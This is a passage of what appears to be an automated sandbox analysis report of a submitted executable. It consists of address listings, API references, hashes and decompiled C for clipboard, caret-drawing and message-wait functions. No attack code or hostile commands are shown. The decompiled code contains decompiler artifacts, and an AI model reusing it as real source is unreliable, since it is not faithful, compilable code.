                                                  0x00000000
                                                  0x00000000
                                                  0x00409150
                                                  0x00409153
                                                  0x00000000
                                                  0x00000000
                                                  0x0040912f
                                                  0x00409132
                                                  0x00000000
                                                  0x00000000
                                                  0x0040913a
                                                  0x0040913d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040915b
                                                  0x0040915e
                                                  0x0040915e
                                                  0x00409164
                                                  0x00409167
                                                  0x00000000
                                                  0x00000000
                                                  0x00409125
                                                  0x004090cf
                                                  0x004090d8
                                                  0x004090e6
                                                  0x004090e9
                                                  0x004090ec
                                                  0x004090f1
                                                  0x004090f2
                                                  0x004090f4
                                                  0x004090f5
                                                  0x004090fa
                                                  0x004090fa
                                                  0x004090fa
                                                  0x00409100
                                                  0x00409106
                                                  0x00409109
                                                  0x00000000
                                                  0x00409109
                                                  0x00000000
                                                  0x00000000
                                                  0x004093eb
                                                  0x004093ee
                                                  0x004093f5
                                                  0x0040940a
                                                  0x0040940a
                                                  0x0040940e
                                                  0x00409412
                                                  0x00409416
                                                  0x00000000
                                                  0x0040941a
                                                  0x004093fa
                                                  0x004093fd
                                                  0x00409403
                                                  0x00409406
                                                  0x00409408
                                                  0x00409424
                                                  0x0040942e
                                                  0x00409435
                                                  0x00409439
                                                  0x00000000
                                                  0x00409439
                                                  0x00000000
                                                  0x00000000
                                                  0x00408bb5
                                                  0x00408bb8
                                                  0x00408bbf
                                                  0x00408c2d
                                                  0x00408c2f
                                                  0x00408c33
                                                  0x00408c37
                                                  0x00408c3b
                                                  0x00408c41
                                                  0x00408c45
                                                  0x00408c4a
                                                  0x00000000
                                                  0x00408c4a
                                                  0x00408bc1
                                                  0x00408bc4
                                                  0x00408bca
                                                  0x00408bce
                                                  0x00408bdf
                                                  0x00408bdf
                                                  0x00408be5
                                                  0x00408be8
                                                  0x00408bee
                                                  0x00408bf0
                                                  0x00408bf3
                                                  0x00408bf9
                                                  0x00408bfd
                                                  0x00408bff
                                                  0x00408c02
                                                  0x00408c02
                                                  0x00408c05
                                                  0x00408c07
                                                  0x00408c0b
                                                  0x00408c14
                                                  0x00408c15
                                                  0x00408c18
                                                  0x00408c1e
                                                  0x00408c21
                                                  0x00408c22
                                                  0x00408c25
                                                  0x00408c26
                                                  0x00408c26
                                                  0x00408c05
                                                  0x00408bfd
                                                  0x00000000
                                                  0x00408c2b
                                                  0x00408bd0
                                                  0x00408bd3
                                                  0x00408bd9
                                                  0x00408bdd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00408ab9
                                                  0x00408abc
                                                  0x00408ac3
                                                  0x00408b93
                                                  0x00408b95
                                                  0x00408b99
                                                  0x00408ba1
                                                  0x00408ba7
                                                  0x00408bab
                                                  0x00408bb0
                                                  0x00000000
                                                  0x00408bb0
                                                  0x00408ac9
                                                  0x00408acc
                                                  0x00408ad2
                                                  0x00408ad6
                                                  0x00408aeb
                                                  0x00408aeb
                                                  0x00408aee
                                                  0x00408af4
                                                  0x00408af8
                                                  0x00408b00
                                                  0x00408b00
                                                  0x00408b05
                                                  0x00408b08
                                                  0x00408b0e
                                                  0x00408b12
                                                  0x00408b35
                                                  0x00408b35
                                                  0x00408b39
                                                  0x00408b3d
                                                  0x00408b42
                                                  0x00408b45
                                                  0x00408b4b
                                                  0x00408b4e
                                                  0x00408b51
                                                  0x00408b57
                                                  0x00408b5a
                                                  0x00408b5d
                                                  0x00408b63
                                                  0x00408b66
                                                  0x00408b70
                                                  0x00408b78
                                                  0x00408b7c
                                                  0x00408b81
                                                  0x00408b84
                                                  0x00408b8a
                                                  0x00000000
                                                  0x00408b14
                                                  0x00408b14
                                                  0x00408b17
                                                  0x00408b1d
                                                  0x00408b21
                                                  0x00000000
                                                  0x00000000
                                                  0x00408b23
                                                  0x00408b26
                                                  0x00408b2c
                                                  0x00408b91
                                                  0x00000000
                                                  0x00408b91
                                                  0x00408b12
                                                  0x00408ad8
                                                  0x00408adb
                                                  0x00408ae1
                                                  0x00408ae5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00408c4f
                                                  0x00408c52
                                                  0x00408c59
                                                  0x00408cc5
                                                  0x00408cc7
                                                  0x00408ccb
                                                  0x00408ccf
                                                  0x00408cd3
                                                  0x00408cd9
                                                  0x00408cdd
                                                  0x00408ce2
                                                  0x00000000
                                                  0x00408ce2
                                                  0x00408c5b
                                                  0x00408c5e
                                                  0x00408c64
                                                  0x00408c68
                                                  0x00408c79
                                                  0x00408c79
                                                  0x00408c7f
                                                  0x00408c82
                                                  0x00408c88
                                                  0x00408c8a
                                                  0x00408c8d
                                                  0x00408c93
                                                  0x00408c97
                                                  0x00408c99
                                                  0x00408c9d
                                                  0x00408ca6
                                                  0x00408ca7
                                                  0x00408caa
                                                  0x00408cb0
                                                  0x00408cb3
                                                  0x00408cb4
                                                  0x00408cb7
                                                  0x00408cbd
                                                  0x00408cbd
                                                  0x00408c97
                                                  0x00000000
                                                  0x00408cc3
                                                  0x00408c6a
                                                  0x00408c6d
                                                  0x00408c73
                                                  0x00408c77
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00408db8
                                                  0x00408dbc
                                                  0x00408dc4
                                                  0x00408dca
                                                  0x00408dce
                                                  0x00000000
                                                  0x00000000
                                                  0x00408ce7
                                                  0x00408cea
                                                  0x00408cf1
                                                  0x00408d72
                                                  0x00408d74
                                                  0x00408d78
                                                  0x00408d7c
                                                  0x00408d80
                                                  0x00408d86
                                                  0x00408d8a
                                                  0x00408d8f
                                                  0x00000000
                                                  0x00408d8f
                                                  0x00408cf6
                                                  0x00408cf9
                                                  0x00408cfc
                                                  0x00408d02
                                                  0x00408d05
                                                  0x00000000
                                                  0x00000000
                                                  0x00408d0a
                                                  0x00408d10
                                                  0x00408d13
                                                  0x00408d19
                                                  0x00408d1c
                                                  0x00408d21
                                                  0x00408d24
                                                  0x00408d27
                                                  0x00408d2f
                                                  0x00408d35
                                                  0x00408d38
                                                  0x00408d3e
                                                  0x00408d42
                                                  0x00408d46
                                                  0x00408d4d
                                                  0x00408d53
                                                  0x00408d57
                                                  0x00408d5d
                                                  0x00408d60
                                                  0x00408d66
                                                  0x00408d6a
                                                  0x00000000
                                                  0x00000000
                                                  0x00408d96
                                                  0x00408d9a
                                                  0x00408d9e
                                                  0x00408da8
                                                  0x00408dac
                                                  0x00000000
                                                  0x00000000
                                                  0x0040904f
                                                  0x00409052
                                                  0x00409055
                                                  0x00409058
                                                  0x0040905e
                                                  0x00409064
                                                  0x00409067
                                                  0x0040906a
                                                  0x0040906d
                                                  0x00000000
                                                  0x00000000
                                                  0x00409071
                                                  0x00409075
                                                  0x0040907d
                                                  0x00409083
                                                  0x00409087
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040884d
                                                  0x004087eb
                                                  0x00409262
                                                  0x00409265
                                                  0x0040926c
                                                  0x00409276
                                                  0x00409282
                                                  0x00409285
                                                  0x00409289
                                                  0x004093d1
                                                  0x00000000
                                                  0x004093e1
                                                  0x00409292
                                                  0x00409299
                                                  0x00000000
                                                  0x004092a6
                                                  0x00000000
                                                  0x00000000
                                                  0x004092b6
                                                  0x00000000
                                                  0x00000000
                                                  0x004092c0
                                                  0x004092c3
                                                  0x004092c9
                                                  0x004092cb
                                                  0x004092cf
                                                  0x004092d2
                                                  0x004092d8
                                                  0x004092da
                                                  0x004092de
                                                  0x004092e1
                                                  0x004092e7
                                                  0x004092e9
                                                  0x004092ed
                                                  0x004092f0
                                                  0x004092f6
                                                  0x004092f8
                                                  0x004092fe
                                                  0x00409302
                                                  0x00409307
                                                  0x0040930a
                                                  0x00409310
                                                  0x00000000
                                                  0x00000000
                                                  0x0040931c
                                                  0x0040931f
                                                  0x00409325
                                                  0x00409329
                                                  0x0040932b
                                                  0x0040932e
                                                  0x00409334
                                                  0x0040933d
                                                  0x00409346
                                                  0x0040934a
                                                  0x0040934a
                                                  0x00000000
                                                  0x00000000
                                                  0x00409354
                                                  0x00409358
                                                  0x00000000
                                                  0x00000000
                                                  0x00409362
                                                  0x00409365
                                                  0x0040936b
                                                  0x0040936d
                                                  0x00409371
                                                  0x00409374
                                                  0x0040937a
                                                  0x0040937c
                                                  0x00409380
                                                  0x00409383
                                                  0x00409389
                                                  0x0040938c
                                                  0x0040938f
                                                  0x00409395
                                                  0x00409399
                                                  0x0040939c
                                                  0x004093a2
                                                  0x004093a5
                                                  0x004093a8
                                                  0x004093ae
                                                  0x004093b8
                                                  0x004093bd
                                                  0x004093c0
                                                  0x004093c6
                                                  0x00000000
                                                  0x00000000
                                                  0x004093e9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409299
                                                  0x00000000
                                                  0x0040926e
                                                  0x004087f7
                                                  0x00408801
                                                  0x00000000
                                                  0x00000000
                                                  0x0040880a
                                                  0x00408811
                                                  0x00000000
                                                  0x004089af
                                                  0x004089b2
                                                  0x004089b9
                                                  0x004089c0
                                                  0x004089c4
                                                  0x004089d1
                                                  0x004089d4
                                                  0x004089da
                                                  0x004089de
                                                  0x004089e0
                                                  0x004089e3
                                                  0x004089e9
                                                  0x004089ed
                                                  0x004089ed
                                                  0x004089f3
                                                  0x004089f6
                                                  0x004089fc
                                                  0x004089c6
                                                  0x004089ca
                                                  0x004089ca
                                                  0x00408a03
                                                  0x00000000
                                                  0x00000000
                                                  0x00408a08
                                                  0x00408a0b
                                                  0x00408a12
                                                  0x00408a53
                                                  0x00408a53
                                                  0x00408a5a
                                                  0x00408a65
                                                  0x00408a5c
                                                  0x00408a5c
                                                  0x00408a5c
                                                  0x00408a6c
                                                  0x00408a70
                                                  0x00408a74
                                                  0x00408a7c
                                                  0x00408a81
                                                  0x00000000
                                                  0x00408a81
                                                  0x00408a14
                                                  0x00408a17
                                                  0x00408a1d
                                                  0x00408a21
                                                  0x00000000
                                                  0x00000000
                                                  0x00408a23
                                                  0x00408a2a
                                                  0x00408a35
                                                  0x00408a2c
                                                  0x00408a2c
                                                  0x00408a2c
                                                  0x00408a3c
                                                  0x00408a3f
                                                  0x00408a40
                                                  0x00408a44
                                                  0x00408a48
                                                  0x00408a4c
                                                  0x00000000
                                                  0x00000000
                                                  0x00408a86
                                                  0x00408a8d
                                                  0x00408a98
                                                  0x00408a8f
                                                  0x00408a8f
                                                  0x00408a8f
                                                  0x00408a9f
                                                  0x00408aa3
                                                  0x00408aa7
                                                  0x00408aab
                                                  0x00408aaf
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00408811
                                                  0x004087b8
                                                  0x004088ae
                                                  0x004088b1
                                                  0x004088b8
                                                  0x004088d0
                                                  0x0040896e
                                                  0x0040897d
                                                  0x00408981
                                                  0x0040898e
                                                  0x0040898e
                                                  0x004089a4
                                                  0x004089a4
                                                  0x00000000
                                                  0x004088b8
                                                  0x004087c4
                                                  0x004087cb
                                                  0x00000000
                                                  0x00000000
                                                  0x004087d4
                                                  0x00000000
                                                  0x00408859
                                                  0x0040885d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040886b
                                                  0x0040886e
                                                  0x0040887a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00408e5a
                                                  0x00408e5d
                                                  0x00408e64
                                                  0x00408e6a
                                                  0x00408e6d
                                                  0x00408e73
                                                  0x00408e77
                                                  0x00408e80
                                                  0x00408e83
                                                  0x00408e89
                                                  0x00408e8c
                                                  0x00408e8f
                                                  0x00408e92
                                                  0x00408e99
                                                  0x00408e9a
                                                  0x00408e9a
                                                  0x00408e9a
                                                  0x00408e9c
                                                  0x00408e9f
                                                  0x00408ec5
                                                  0x00408ea1
                                                  0x00408ea4
                                                  0x00408ea7
                                                  0x00408ead
                                                  0x00408eb0
                                                  0x00408eb3
                                                  0x00408eb6
                                                  0x00408ebd
                                                  0x00408ebe
                                                  0x00408ebe
                                                  0x00408ebe
                                                  0x00408ec0
                                                  0x00408ec0
                                                  0x00408ecf
                                                  0x00408ed5
                                                  0x00408ed8
                                                  0x00408edb
                                                  0x00408ede
                                                  0x00408ee5
                                                  0x00408ee6
                                                  0x00408ee6
                                                  0x00408ee6
                                                  0x00408ee8
                                                  0x00408eeb
                                                  0x00408f0e
                                                  0x00408eed
                                                  0x00408ef0
                                                  0x00408ef6
                                                  0x00408ef9
                                                  0x00408efc
                                                  0x00408eff
                                                  0x00408f06
                                                  0x00408f07
                                                  0x00408f07
                                                  0x00408f07
                                                  0x00408f09
                                                  0x00408f09
                                                  0x00408f15
                                                  0x00408f19
                                                  0x00408f1d
                                                  0x00408f21
                                                  0x00408f21
                                                  0x00408e77
                                                  0x00000000
                                                  0x00000000
                                                  0x00408dd8
                                                  0x00408ddb
                                                  0x00408de2
                                                  0x00408de4
                                                  0x00408de7
                                                  0x00408dea
                                                  0x00408dee
                                                  0x00408df0
                                                  0x00408df3
                                                  0x00408df6
                                                  0x00408dfe
                                                  0x00408e01
                                                  0x00408e04
                                                  0x00408e0c
                                                  0x00408e0f
                                                  0x00408e15
                                                  0x00408e19
                                                  0x00408e23
                                                  0x00408e29
                                                  0x00408e2d
                                                  0x00408e2d
                                                  0x00408dee
                                                  0x00000000
                                                  0x00000000
                                                  0x00408e37
                                                  0x00408e3a
                                                  0x00408e41
                                                  0x00408e43
                                                  0x00408e46
                                                  0x00408e49
                                                  0x00408e4d
                                                  0x00408e4f
                                                  0x00408e4f
                                                  0x00408e4d
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • GetWindowLongW.USER32(?,00000000), ref: 0040879F
                                                  • PostQuitMessage.USER32(00000000), ref: 0040887A
                                                  • DefWindowProcW.USER32(?,00000401,?,?), ref: 00409450
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Window$LongMessagePostProcQuit
                                                  • String ID:
                                                  • API String ID: 2284477626-0
                                                  • Opcode ID: 6765d5aaa4f88537f090bb301a433648afaac4aba333ad3edadd88c7d82ac5a7
                                                  • Instruction ID: c02a697f6eeb1a2ee5aa009847c55483d3b6aa878a4a73e3dd73853b162551cd
                                                  • Opcode Fuzzy Hash: 6765d5aaa4f88537f090bb301a433648afaac4aba333ad3edadd88c7d82ac5a7
                                                  • Instruction Fuzzy Hash: 61F12E74A04109EFCB04DF94C684BAEB7B5BF48304F2481AAE545AB392CB39EE41DF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402740 Relevance: 12.2, APIs: 8, Instructions: 164clipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E00402740(intOrPtr _a4) {
				short* _v8;
				intOrPtr _v12;
				void* _v16;
				short _v18;
				short _v20;
				short _v24;
				signed int _v28;
				signed int _v32;
				void* _v36;
				short _v40;
				short _v44;
				short _v48;
				void* _v52;
				int _t113;

				_t169 =  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1c);
				asm("cdq");
				_v32 = ( *((short*)( *((intOrPtr*)(_a4 + 0x84)) + 0x18)) -  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1c) ^  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1c)) - _t169 + 1;
				_t171 =  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1e);
				asm("cdq");
				_v28 = ( *((short*)( *((intOrPtr*)(_a4 + 0x84)) + 0x1a)) -  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1e) ^  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1e)) - _t171 + 1;
				_t113 = OpenClipboard( *(_a4 + 0xa8));
				if(_t113 != 0) {
					EmptyClipboard();
					_v16 = GlobalAlloc(2, (_v32 + 1) * _v28 << 1);
					if(_v16 == 0) {
						L25:
						return CloseClipboard();
					}
					_v36 = GlobalLock(_v16);
					_v12 = _v36;
					if(_v12 == 0) {
						goto L25;
					}
					if( *((short*)( *((intOrPtr*)(_a4 + 0x84)) + 0x18)) >=  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1c)) {
						_v40 =  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1c);
					} else {
						_v40 =  *((short*)( *((intOrPtr*)(_a4 + 0x84)) + 0x18));
					}
					_v20 = _v40;
					if( *((short*)( *((intOrPtr*)(_a4 + 0x84)) + 0x1a)) >=  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1e)) {
						_v44 =  *( *((intOrPtr*)(_a4 + 0x84)) + 0x1e);
					} else {
						_v44 =  *((short*)( *((intOrPtr*)(_a4 + 0x84)) + 0x1a));
					}
					_v18 = _v44;
					_v24 = _v18;
					while(_v24 < _v18 + _v28) {
						_v8 = _v12 + _v32 * 2;
						while(_v8 > _v12 && ( *(_v8 - 2) & 0x0000ffff) == 0x20) {
							_v8 = _v8 - 2;
						}
						if(_v24 >= _v18 + _v28 - 1) {
							_v48 = 0;
						} else {
							_v48 = 0xa;
						}
						 *_v8 = _v48;
						_v12 = _v8 + 2;
						_v24 = _v24 + 1;
					}
					if(_v12 - _v36 >> 1 != (_v32 + 1) * _v28) {
						_v52 = GlobalReAlloc(_v16, _v12 - _v36 >> 1 << 1, 2);
						if(_v52 != 0) {
							_v16 = _v52;
						}
					}
					GlobalUnlock(_v16);
					SetClipboardData(0xd, _v16);
					goto L25;
				}
				return _t113;
			}

















                                                  0x0040275c
                                                  0x00402762
                                                  0x0040276a
                                                  0x00402783
                                                  0x00402789
                                                  0x00402791
                                                  0x0040279e
                                                  0x004027a6
                                                  0x004027ad
                                                  0x004027c8
                                                  0x004027cf
                                                  0x00402952
                                                  0x00000000
                                                  0x00402952
                                                  0x004027df
                                                  0x004027e5
                                                  0x004027ec
                                                  0x00000000
                                                  0x00000000
                                                  0x0040280e
                                                  0x0040282f
                                                  0x00402810
                                                  0x0040281d
                                                  0x0040281d
                                                  0x00402836
                                                  0x00402856
                                                  0x00402877
                                                  0x00402858
                                                  0x00402865
                                                  0x00402865
                                                  0x0040287e
                                                  0x00402886
                                                  0x00402894
                                                  0x004028a9
                                                  0x004028ac
                                                  0x004028c6
                                                  0x004028c6
                                                  0x004028d9
                                                  0x004028e4
                                                  0x004028db
                                                  0x004028db
                                                  0x004028db
                                                  0x004028f2
                                                  0x004028fb
                                                  0x00402891
                                                  0x00402891
                                                  0x00402914
                                                  0x0040292d
                                                  0x00402934
                                                  0x00402939
                                                  0x00402939
                                                  0x00402934
                                                  0x00402940
                                                  0x0040294c
                                                  0x00000000
                                                  0x0040294c
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ClipboardGlobal$AllocEmptyLockOpen
                                                  • String ID:
                                                  • API String ID: 3590494090-0
                                                  • Opcode ID: 6f25ad71efc50c5de9ccdb62d5cf142cb7bcc1685473e82c0973901b690c3ebe
                                                  • Instruction ID: 269373563e95356fc7e10bc16634e1d526d5d1a54b4c283d20d40c66aa4384e6
                                                  • Opcode Fuzzy Hash: 6f25ad71efc50c5de9ccdb62d5cf142cb7bcc1685473e82c0973901b690c3ebe
                                                  • Instruction Fuzzy Hash: CD71FA74A0051ADFCB08DF94C584AEEBBB1FF48305F24C2AAD845AB395D7749A82CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404E90 Relevance: 12.1, APIs: 8, Instructions: 106windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404E90(struct HWND__* _a4, short _a8, short _a10, short _a12, short _a14) {
				struct HDC__* _v8;
				struct tagRECT _v24;
				struct HWND__* _t59;
				struct HWND__* _t64;

				_t59 = _a8;
				if(_t59 < 0) {
					L8:
					return _t59;
				}
				_t59 =  *(_a4 + 8);
				if(_a8 >=  *((intOrPtr*)(_t59 + 0xc)) || _a12 < 0) {
					goto L8;
				}
				_t59 = _a4;
				if(_a12 >=  *((intOrPtr*)( *((intOrPtr*)(_t59 + 8)) + 0xc)) || _a10 < 0) {
					goto L8;
				}
				_t59 = _a10;
				if(_t59 >=  *((intOrPtr*)( *(_a4 + 8) + 0x10))) {
					goto L8;
				}
				_t59 = _a14;
				if(_t59 < 0) {
					goto L8;
				}
				_t59 =  *(_a4 + 8);
				if(_a14 >=  *((intOrPtr*)(_t59 + 0x10))) {
					goto L8;
				}
				E00404150(_a4,  &_v24);
				_v8 = GetDC( *(_a4 + 0xa8));
				if(_v8 != 0) {
					if( *(_a4 + 0xa8) == GetFocus() &&  *((intOrPtr*)( *(_a4 + 8) + 0x18)) != 0) {
						HideCaret( *(_a4 + 0xa8));
					}
					InvertRect(_v8,  &_v24);
				}
				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x18)) = _a8;
				_t64 = _a4;
				 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x84)) + 0x1c)) = _a12;
				if(_v8 != 0) {
					E00404150(_a4,  &_v24);
					InvertRect(_v8,  &_v24);
					ReleaseDC( *(_a4 + 0xa8), _v8);
					_t64 = GetFocus();
					if( *(_a4 + 0xa8) == _t64) {
						_t64 =  *(_a4 + 8);
						if( *((intOrPtr*)(_t64 + 0x18)) != 0) {
							return ShowCaret( *(_a4 + 0xa8));
						}
					}
				}
				return _t64;
			}







                                                  0x00404e96
                                                  0x00404e9c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404ea5
                                                  0x00404eab
                                                  0x00000000
                                                  0x00000000
                                                  0x00404eb9
                                                  0x00404ec2
                                                  0x00000000
                                                  0x00000000
                                                  0x00404ecc
                                                  0x00404ed9
                                                  0x00000000
                                                  0x00000000
                                                  0x00404edb
                                                  0x00404ee1
                                                  0x00000000
                                                  0x00000000
                                                  0x00404eea
                                                  0x00404ef0
                                                  0x00000000
                                                  0x00000000
                                                  0x00404eff
                                                  0x00404f14
                                                  0x00404f1b
                                                  0x00404f2c
                                                  0x00404f44
                                                  0x00404f44
                                                  0x00404f52
                                                  0x00404f52
                                                  0x00404f64
                                                  0x00404f67
                                                  0x00404f73
                                                  0x00404f7a
                                                  0x00404f84
                                                  0x00404f91
                                                  0x00404fa5
                                                  0x00404fab
                                                  0x00404fba
                                                  0x00404fbf
                                                  0x00404fc6
                                                  0x00000000
                                                  0x00404fd2
                                                  0x00404fc6
                                                  0x00404fba
                                                  0x00404fdb

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CaretFocusInvertRect$HideReleaseShow
                                                  • String ID:
                                                  • API String ID: 1353628544-0
                                                  • Opcode ID: 36ba532a911eb452633ff840d2152630db0dde66d080d18bfab3703d5527aacb
                                                  • Instruction ID: 7f274ea54bbecf8e91e2f24ab674b1f30a55f2372a65135cead816cce49e9591
                                                  • Opcode Fuzzy Hash: 36ba532a911eb452633ff840d2152630db0dde66d080d18bfab3703d5527aacb
                                                  • Instruction Fuzzy Hash: 9B410B74200209EFCB08DF54C484AAAB7B5BF88740F10C5A9FA499B791D734EE81DB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404CA0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E00404CA0(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				char _v36;
				void* _v48;
				struct tagMSG _v76;
				char* _t74;
				intOrPtr _t87;
				void* _t112;

				_v20 = 0;
				_v12 = 0;
				if(_a8 == 0) {
					L6:
					if(E00401AD0(_t90, 0x1000) != 0) {
						 *((intOrPtr*)(_t112 + _v12 * 4 - 0x2c)) =  *_a4;
						_v12 = _v12 + 1;
						if(_a8 != 0) {
							 *((intOrPtr*)(_t112 + _v12 * 4 - 0x2c)) = _v20;
							_v12 = _v12 + 1;
						}
						if( *((intOrPtr*)(_a4 + 0xac)) != 0) {
							 *((intOrPtr*)(_t112 + _v12 * 4 - 0x2c)) =  *((intOrPtr*)(_a4 + 0xac));
							_v12 = _v12 + 1;
						}
						L12:
						L12:
						if( *((intOrPtr*)(_a4 + 0xa8)) == 0) {
							_v24 = WaitForMultipleObjects(_v12,  &_v48, 0, 0xffffffff);
						} else {
							_v24 = MsgWaitForMultipleObjects(_v12,  &_v48, 0, 0xffffffff, 0x1cff);
						}
						if(_v24 != _v12) {
							goto L21;
						}
						while(PeekMessageW( &_v76, 0, 0, 0, 1) != 0) {
							if(_v76.message != 0x12) {
								DispatchMessageW( &_v76);
								continue;
							}
							return 0;
						}
						goto L12;
						L21:
						_v28 = _v24;
						if(_v28 == 0) {
							EnterCriticalSection(0x41f57c);
							_v16 = E004056E0(_a4);
							LeaveCriticalSection(0x41f57c);
							if(_v16 == 0) {
								L32:
								goto L12;
							}
							return 0;
						}
						if(_v28 == 1) {
							_t74 =  &_v36;
							0x400000(_a8, _v20, 0, 0, _t74,  &_v8, 2, 0, 0);
							_v16 = _t74;
							if(_v16 == 0 || _v16 == 0x103) {
								goto L32;
							} else {
								return 1;
							}
						}
						return 0;
					}
					return 1;
				}
				_v20 = CreateEventW(0, 1, 0, 0);
				if(_v20 != 0) {
					_t90 =  &_v36;
					_t87 = _a8;
					0x400000(_t87, _v20, 0, 0,  &_v36,  &_v8, 2, 0, 0);
					_v16 = _t87;
					if(_v16 == 0 || _v16 == 0x103) {
						goto L6;
					} else {
						return 1;
					}
				}
				return 1;
			}















                                                  0x00404ca6
                                                  0x00404cad
                                                  0x00404cb8
                                                  0x00404d16
                                                  0x00404d22
                                                  0x00404d36
                                                  0x00404d40
                                                  0x00404d47
                                                  0x00404d4f
                                                  0x00404d59
                                                  0x00404d59
                                                  0x00404d66
                                                  0x00404d74
                                                  0x00404d7e
                                                  0x00404d7e
                                                  0x00000000
                                                  0x00404d81
                                                  0x00404d8b
                                                  0x00404dbb
                                                  0x00404d8d
                                                  0x00404da4
                                                  0x00404da4
                                                  0x00404dc4
                                                  0x00000000
                                                  0x00000000
                                                  0x00404dc6
                                                  0x00404de0
                                                  0x00404ded
                                                  0x00000000
                                                  0x00404ded
                                                  0x00000000
                                                  0x00404de2
                                                  0x00000000
                                                  0x00404df7
                                                  0x00404dfa
                                                  0x00404e01
                                                  0x00404e10
                                                  0x00404e1f
                                                  0x00404e27
                                                  0x00404e31
                                                  0x00404e77
                                                  0x00000000
                                                  0x00404e77
                                                  0x00000000
                                                  0x00404e33
                                                  0x00404e07
                                                  0x00404e43
                                                  0x00404e53
                                                  0x00404e58
                                                  0x00404e5f
                                                  0x00000000
                                                  0x00404e6a
                                                  0x00000000
                                                  0x00404e6a
                                                  0x00404e5f
                                                  0x00000000
                                                  0x00404e73
                                                  0x00000000
                                                  0x00404d24
                                                  0x00404cc8
                                                  0x00404ccf
                                                  0x00404ce5
                                                  0x00404cf1
                                                  0x00404cf5
                                                  0x00404cfa
                                                  0x00404d01
                                                  0x00000000
                                                  0x00404d0c
                                                  0x00000000
                                                  0x00404d0c
                                                  0x00404d01
                                                  0x00000000

                                                  APIs
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00404CC2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
